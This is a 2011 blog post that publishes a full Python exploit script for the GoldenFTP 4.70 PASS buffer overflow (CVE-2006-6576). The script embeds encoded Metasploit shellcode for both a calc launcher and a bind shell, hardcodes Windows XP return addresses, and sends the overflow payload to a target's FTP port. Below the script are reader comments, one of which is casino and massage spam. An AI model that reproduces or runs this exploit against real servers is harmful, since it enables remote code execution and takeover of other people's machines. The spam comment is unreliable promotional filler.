Friday, July 8, 2011

Revised V2.5 Golden FTP 4.70 PASS overflow exploit


#!/usr/bin/python
#
###########################################################################
## Exploit Title: Revised V2.5: GoldenFTP 4.70 PASS overflow exploit
## Exploit Version: 2.5, 2011-07-08 15:00
## Date: July 8, 2011 (20110708-1500)
## Author: Joff Thyer (jsthyer@gmail.com)
## Software Link: http://www.goldenftpserver.com/
## Version: 4.70
## Tested on: WinXP-SP0/SP2/SP3
## CVE: 2006-6576
##
## based on exploit by:
##   Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
##
## NOTES:
## (1) You must make sure that the "Show new connections" option is enabled
## in order for this exploit to work.
## (2) Specifying the IP source address is important as it is used in the
## calculation of the overflow buffer offset.
###########################################################################
#


import socket
import sys
from subprocess import Popen, PIPE
import re
import time


# Metasploit
# ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3
# 281 bytes
calc = \
"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9" +\
"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0" +\
"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d" +\
"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56" +\
"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae" +\
"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69" +\
"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63" +\
"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37" +\
"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6" +\
"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59" +\
"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e" +\
"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45" +\
"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b" +\
"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd" +\
"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f" +\
"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4" +\
"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27" +\
"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6" +\
"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda" +\
"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f" +\
"\x88"


# Metasploit
# ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3
# 422 bytes
cmdshell = \
"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9" +\
"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5" +\
"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e" +\
"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66" +\
"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98" +\
"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb" +\
"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae" +\
"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10" +\
"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0" +\
"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73" +\
"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a" +\
"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78" +\
"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc" +\
"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc" +\
"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38" +\
"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e" +\
"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26" +\
"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70" +\
"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25" +\
"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd" +\
"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d" +\
"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8" +\
"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33" +\
"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f" +\
"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70" +\
"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2" +\
"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85" +\
"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8" +\
"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6" +\
"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4" +\
"\x8c\xc7"


if len(sys.argv) < 5:
     print "[-]Usage: %s <src addr> <target addr> <shellcode> <platform>" % sys.argv[0]
     print "\tshellcode = (calc|shell)"
     print "\tplatform = (sp0|sp2|sp3)"
     print "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2"
     sys.exit(0)


srcaddr = sys.argv[1]
target = sys.argv[2]
shellcode = sys.argv[3]
platform = sys.argv[4]


# which payload?
buf = calc
if shellcode == "calc":
     buf = calc
elif shellcode == "shell":
     buf = cmdshell


# address of JMP ESI in Kernel32.dll
if platform == "sp0":
     jmpesi = "\x7b\x15\xe8\x77"
elif platform == "sp2":
     jmpesi = "\xc3\x72\x85\x7c"
elif platform == "sp3":
     jmpesi = "\x0b\xda\x82\x7c"


shortjmp = "\x90\x90\x90\x90\xeb\x20\n"
nopsled = "\x90" * 60
padding = "A" * (533 - len(srcaddr + buf + nopsled))
payload = nopsled + buf + padding + jmpesi


print "\
[+] Golden FTP PASS Exploit\n\
[+] Version 2.5, July 8 2011\n\
[+] Author: Joff Thyer (jsthyer@gmail.com)\n\
[+] 'Show new connections' must be enabled in GoldenFTP in order\n\
[+] for this exploit to succeed!\n\
[+] Connecting: "+target


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,21))
except:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)


print "[+] Sending payload, length = " + `len(payload)`
s.send(shortjmp);
s.send("USER anonymous\n")
s.send("PASS " + payload + "\n")
s.recv(1024)
print "[+] Sleeping 2 secs..."
time.sleep(2)
s.close()


if shellcode == "shell" and srcaddr == target:
     p = Popen(["netstat","-na"],stdout=PIPE,shell=False)
     netstat = p.stdout.read()
     shellok = re.search("TCP\s*0\.0\.0\.0:4444.*LISTENING",netstat)
     if shellok:
          print "[+] "+shellok.group(0)


print "[+] Done."
sys.exit(0)





3 comments:

Unisung said...

Hi

Unisung said...
This comment has been removed by the author.
macleanvalin said...

Best Casinos Near Harrah's Casino, Chester, PA
Find the 김포 출장안마 best 청주 출장안마 Casinos near Harrah's 구미 출장마사지 Casino, Chester, PA near Harrah's Casino on 서귀포 출장안마 MapYRO. Find your way around 충청남도 출장마사지 the casino, find where everything is located with